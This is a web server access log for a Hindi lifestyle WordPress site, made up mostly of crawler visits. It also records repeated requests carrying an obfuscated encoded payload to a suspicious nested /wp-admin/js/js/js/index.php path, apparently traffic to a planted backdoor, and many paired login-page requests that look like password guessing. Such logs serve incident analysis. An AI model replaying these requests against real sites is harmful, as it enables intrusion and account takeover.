216.244.66.235 - - [20/Oct/2025:08:43:32 -0400] "GET /tag/shikha-sharma-chief-executive-officer-of-axis-bank/ HTTP/2.0" 200 150281 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:43:40 -0400] "GET /tag/tips-to-make-oil-free-dhokla-at-home-how-to-make-oil-free-dhokla-in-hindi/ HTTP/2.0" 200 149898 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
85.208.96.202 - - [20/Oct/2025:08:43:44 -0400] "GET /tag/how-to-make-dull-eyes-glow-amazingly/ HTTP/2.0" 200 149686 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.116.199.115 - - [20/Oct/2025:08:41:20 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373638302p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343038302q3433366662366335623333373934363061653130623961373636383662343365222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:43:48 -0400] "GET /tag/what-to-apply-on-face-before-going-to-bed-at-night/ HTTP/2.0" 200 149941 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:43:56 -0400] "GET /tag/fertility-test/ HTTP/2.0" 200 149490 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:44:04 -0400] "GET /tag/white-eyeliner-brands/ HTTP/2.0" 200 149670 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:41:42 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373730322p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343130322q3334666665313935313538616430323765303635383730656636393932363139222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
85.208.96.207 - - [20/Oct/2025:08:44:10 -0400] "GET /tag/natural-ways-to-get-rid-of-a-headache/ HTTP/2.0" 200 149630 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:44:12 -0400] "GET /tag/after-having-dinner-tips-in-hindi/ HTTP/2.0" 200 149597 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:44:22 -0400] "GET /tag/how-to-get-relief-from-ingrown-hair/ HTTP/2.0" 200 149727 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
85.208.96.196 - - [20/Oct/2025:08:44:27 -0400] "GET /tag/low-fat-paneer-amul/ HTTP/2.0" 200 149997 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.116.199.115 - - [20/Oct/2025:08:42:05 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373732352p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343132352q6437323237613339653232363731326632373739396433666134656536313931222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:44:31 -0400] "GET /tag/how-to-use-waste-things-to-make-a-useful-material/ HTTP/2.0" 200 149835 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
2a03:2880:f800:3c:: - - [20/Oct/2025:08:44:32 -0400] "GET /6-amazing-ways-to-wear-palazzo-in-summers/ HTTP/2.0" 200 319817 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
103.110.127.136 - - [20/Oct/2025:08:44:37 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
85.208.96.197 - - [20/Oct/2025:08:44:38 -0400] "GET /tag/how-to-get-big-bum-and-thighs/ HTTP/2.0" 200 149672 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:44:38 -0400] "GET /tag/indoor-vegetable-garden-system/ HTTP/2.0" 200 149858 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
103.110.127.136 - - [20/Oct/2025:08:44:43 -0400] "POST /wp-login.php HTTP/2.0" 200 7145 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0"
216.244.66.235 - - [20/Oct/2025:08:44:46 -0400] "GET /tag/white-chocolate-candy-recipes/ HTTP/2.0" 200 149880 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:42:27 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373734372p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343134372q3164386632333035316362396162346534373237623835356631666164363837222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:44:55 -0400] "GET /kitchen-ingredients-to-lose-weight/ HTTP/2.0" 200 322123 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
173.252.167.80 - - [20/Oct/2025:08:45:01 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
173.252.167.80 - - [20/Oct/2025:08:45:02 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:45:03 -0400] "GET /tag/recipes-for-stress-relief/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:45:04 -0400] "GET /tag/recipes-for-stress-relief/feed/ HTTP/2.0" 200 8699 "https://hindi.blushin.com/tag/recipes-for-stress-relief/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:45:06 -0400] "GET /tag/about-menstruation/ HTTP/2.0" 200 149571 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:45:08 -0400] "GET /tag/bad-effects-can-holding-urine HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:45:10 -0400] "GET /tag/bad-effects-can-holding-urine/ HTTP/2.0" 200 149634 "https://hindi.blushin.com/tag/bad-effects-can-holding-urine" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:45:13 -0400] "GET /tag/hair-packs-for-controlling-the-frizz HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:45:15 -0400] "GET /tag/hair-packs-for-controlling-the-frizz/ HTTP/2.0" 200 149955 "https://hindi.blushin.com/tag/hair-packs-for-controlling-the-frizz" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:08:42:50 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373737302p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343137302q3062613336653535316162346465656561616264616562376532616435343666222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
185.191.171.14 - - [20/Oct/2025:08:45:15 -0400] "GET /tag/virgo-flirting-style/ HTTP/2.0" 200 149488 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:45:18 -0400] "GET /tag/tips-for-love-marriage/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:45:18 -0400] "GET /tag/benefits-of-spices-in-food/ HTTP/2.0" 200 149842 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
114.119.131.42 - - [20/Oct/2025:08:45:19 -0400] "GET /how-to-make-at-home-bombay-halwa-recipe/how-to-make-at-home-bombay-halwa-recipe/ HTTP/2.0" 200 150269 "https://hindi.blushin.com/attachment-sitemap32.xml" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.143 - - [20/Oct/2025:08:45:20 -0400] "GET /tag/tips-for-love-marriage/feed/ HTTP/2.0" 200 22571 "https://hindi.blushin.com/tag/tips-for-love-marriage/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
51.38.53.154 - - [20/Oct/2025:08:45:22 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:45:23 -0400] "GET /tag/fish-and-broccoli-diet-bodybuilding HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
85.208.96.211 - - [20/Oct/2025:08:45:24 -0400] "GET /tag/know-about-the-most-expensive-foods-of-world/ HTTP/2.0" 200 149815 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:45:25 -0400] "GET /tag/fish-and-broccoli-diet-bodybuilding/ HTTP/2.0" 200 149797 "https://hindi.blushin.com/tag/fish-and-broccoli-diet-bodybuilding" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:45:28 -0400] "GET /tag/wash-your-face-and-remove-makeup HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.249.73.73 - - [20/Oct/2025:08:45:29 -0400] "GET /42470854?entity=0042412834 HTTP/2.0" 200 203666 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:08:45:30 -0400] "GET /tag/wash-your-face-and-remove-makeup/ HTTP/2.0" 200 149601 "https://hindi.blushin.com/tag/wash-your-face-and-remove-makeup" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:45:29 -0400] "GET /tag/causes-of-irregular-periods-in-hindi/ HTTP/2.0" 200 149689 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
186.250.85.78 - - [20/Oct/2025:08:45:30 -0400] "GET /tag/how-to-save-your-skin-from-tanning-during-summers/ HTTP/2.0" 200 149811 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Brave Chrome/87.0.4280.141 Safari/537.36"
51.38.53.154 - - [20/Oct/2025:08:45:31 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
178.33.250.142 - - [20/Oct/2025:08:45:34 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:45:34 -0400] "GET /?p=48237 HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:45:36 -0400] "GET /know-the-benefits-of-date-that-will-make-you-crazy/ HTTP/2.0" 200 317466 "https://hindi.blushin.com/?p=48237" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
178.33.250.142 - - [20/Oct/2025:08:45:37 -0400] "POST /wp-login.php HTTP/2.0" 200 7093 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:43:12 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373739322p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343139322q3166363365393130356566346465343930333731383035663532366263363563222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:08:45:39 -0400] "GET /tag/footwear-style-tips/ HTTP/2.0" 200 149580 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
2a03:2880:f800:c:: - - [20/Oct/2025:08:45:39 -0400] "GET /know-here-relationship-tips-to-make-sister-in-law-relation-stronger/ HTTP/2.0" 200 314871 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.143 - - [20/Oct/2025:08:45:41 -0400] "GET /tag/bhumi-pednekar-wiki HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
178.239.147.118 - - [20/Oct/2025:08:45:44 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:45:43 -0400] "GET /tag/bhumi-pednekar-wiki/ HTTP/2.0" 200 149815 "https://hindi.blushin.com/tag/bhumi-pednekar-wiki" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
178.239.147.118 - - [20/Oct/2025:08:45:44 -0400] "POST /wp-login.php HTTP/2.0" 200 7090 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:45:49 -0400] "GET /tag/get-beautiful-feet-using-mouth-wash/ HTTP/2.0" 200 149583 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
178.33.250.142 - - [20/Oct/2025:08:45:54 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:45:58 -0400] "GET /tag/get-rid-of-yellow-nails HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:45:57 -0400] "GET /tag/health-benefits-of-lemon-in-hindi/ HTTP/2.0" 200 149634 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
178.33.250.142 - - [20/Oct/2025:08:46:00 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:43:34 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373831342p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343231342q3535653539623230303862663130333233613132653464653035346266336538222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.73.216.143 - - [20/Oct/2025:08:45:59 -0400] "GET /tag/get-rid-of-yellow-nails/ HTTP/2.0" 200 151569 "https://hindi.blushin.com/tag/get-rid-of-yellow-nails" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
185.191.171.11 - - [20/Oct/2025:08:46:02 -0400] "GET /tag/menstrual-cycle-problems/ HTTP/2.0" 200 149650 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
179.63.56.249 - - [20/Oct/2025:08:46:02 -0400] "GET /these-shower-habits-to-get-glowing-skin/ HTTP/2.0" 200 316720 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:08:46:05 -0400] "GET /love-has-few-compromises-sometimes/q-2 HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:46:05 -0400] "GET /tag/how-to-apply-kajal-step-by-step-with-pictures/ HTTP/2.0" 200 149950 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:46:07 -0400] "GET /love-has-few-compromises-sometimes/q-2/ HTTP/2.0" 200 150341 "https://hindi.blushin.com/love-has-few-compromises-sometimes/q-2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:46:14 -0400] "GET /tag/how-to-make-husband-romantic-mood/ HTTP/2.0" 200 149810 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:46:15 -0400] "GET /tag/bone-strengthening-foods/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:46:16 -0400] "GET /tag/bone-strengthening-foods/feed/ HTTP/2.0" 200 10317 "https://hindi.blushin.com/tag/bone-strengthening-foods/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
178.33.43.96 - - [20/Oct/2025:08:46:18 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.249.73.73 - - [20/Oct/2025:08:46:18 -0400] "GET /42450941?entity=0042392950 HTTP/2.0" 200 190865 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.33.43.96 - - [20/Oct/2025:08:46:21 -0400] "POST /wp-login.php HTTP/2.0" 200 7089 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:43:56 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373833362p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343233362q3065333962326335363031623634636531383135303836353536356235313262222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
66.249.73.64 - - [20/Oct/2025:08:46:22 -0400] "GET /42960327?entity=0042901630 HTTP/2.0" 200 192591 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:08:46:22 -0400] "GET /tag/signs-of-a-liar-cheating/ HTTP/2.0" 200 149853 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:46:25 -0400] "GET /tag/benefits-of-red-wine-for-skin-and-hair-in-hindi/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:46:26 -0400] "GET /tag/benefits-of-red-wine-for-skin-and-hair-in-hindi/feed/ HTTP/2.0" 200 25809 "https://hindi.blushin.com/tag/benefits-of-red-wine-for-skin-and-hair-in-hindi/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.244.66.235 - - [20/Oct/2025:08:46:30 -0400] "GET /tag/sour-fruits-with-dairy-products/ HTTP/2.0" 200 149835 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:46:36 -0400] "GET /tag/bael-fruit-juice-benefits HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
202.131.96.220 - - [20/Oct/2025:08:46:38 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
85.208.96.204 - - [20/Oct/2025:08:46:36 -0400] "GET /tag/%E0%A4%A6%E0%A4%BF%E0%A4%B5%E0%A4%BE%E0%A4%B2%E0%A5%80/ HTTP/2.0" 200 154557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
50.21.186.206 - - [20/Oct/2025:08:46:38 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:08:46:37 -0400] "GET /tag/tips-for-neck-care-in-hindi/ HTTP/2.0" 200 149567 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:46:37 -0400] "GET /tag/bael-fruit-juice-benefits/ HTTP/2.0" 200 149487 "https://hindi.blushin.com/tag/bael-fruit-juice-benefits" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
202.131.96.220 - - [20/Oct/2025:08:46:39 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
50.21.186.206 - - [20/Oct/2025:08:46:41 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:08:44:18 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936373835382p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936343235382q3261663964343933316230333963623662323834656636633563393737653936222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
85.208.96.196 - - [20/Oct/2025:08:46:45 -0400] "GET /tag/diy-homemade-facial-cleansers/ HTTP/2.0" 200 149662 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
114.119.131.42 - - [20/Oct/2025:08:46:46 -0400] "GET /7-cheats-to-jazz-up-any-boring-outfit/cheats-to-jazz-up-any-boring-outfit-5/ HTTP/2.0" 200 151082 "https://hindi.blushin.com/attachment-sitemap13.xml" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.244.66.235 - - [20/Oct/2025:08:46:46 -0400] "GET /tag/tourist-places-in-india-map/ HTTP/2.0" 200 149931 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:46:48 -0400] "GET /tag/green-tea-for-skin-pigmentation HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:08:46:49 -0400] "GET /tag/green-tea-for-skin-pigmentation/ HTTP/2.0" 200 149761 "https://hindi.blushin.com/tag/green-tea-for-skin-pigmentation" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
101.53.145.3 - - [20/Oct/2025:08:46:51 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
